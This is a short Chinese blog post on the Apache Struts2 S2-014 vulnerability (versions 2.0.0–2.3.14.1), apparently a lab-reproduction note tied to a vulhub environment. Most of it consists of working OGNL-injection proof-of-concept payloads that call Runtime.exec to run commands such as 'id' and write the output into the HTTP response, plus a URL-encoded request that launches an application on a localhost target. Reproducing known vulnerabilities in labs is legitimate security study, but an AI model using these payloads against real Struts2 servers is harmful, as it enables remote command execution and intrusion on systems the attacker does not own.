该博客介绍了Struts2 S2-014漏洞,影响版本为2.0.0 - 2.3.14.1,详细信息可查看指定链接。还给出了漏洞复现方法,GET传入特定Poc并使用encodeURIComponent编码方式可执行命令,S2-014是对S2-013修复的加强。
漏洞简介
影响版本: 2.0.0 - 2.3.14.1
详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-013/README.zh-cn.md
漏洞复现
GET传入以下Poc即可执行命令:
${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(#d),#out.close())}
// 或
${#_memberAccess["allowStaticMethodAccess"]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}
注意要encodeURIComponent编码方式,即会对特殊符号的url编码:
S2-014 是对 S2-013 修复的加强,在 S2-013 修复的代码中忽略了 ${ognl_exp} OGNL 表达式执行的方式,因此 S2-014 是对其的补丁加强:
http://localhost:8080/S2-013/link.action?xxxx=%24%7B%28%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%29%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29%28@java.lang.Runtime@getRuntime%28%29.exec%28%22open%20%2fApplications%2fCalculator.app%22%29%29%7D
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
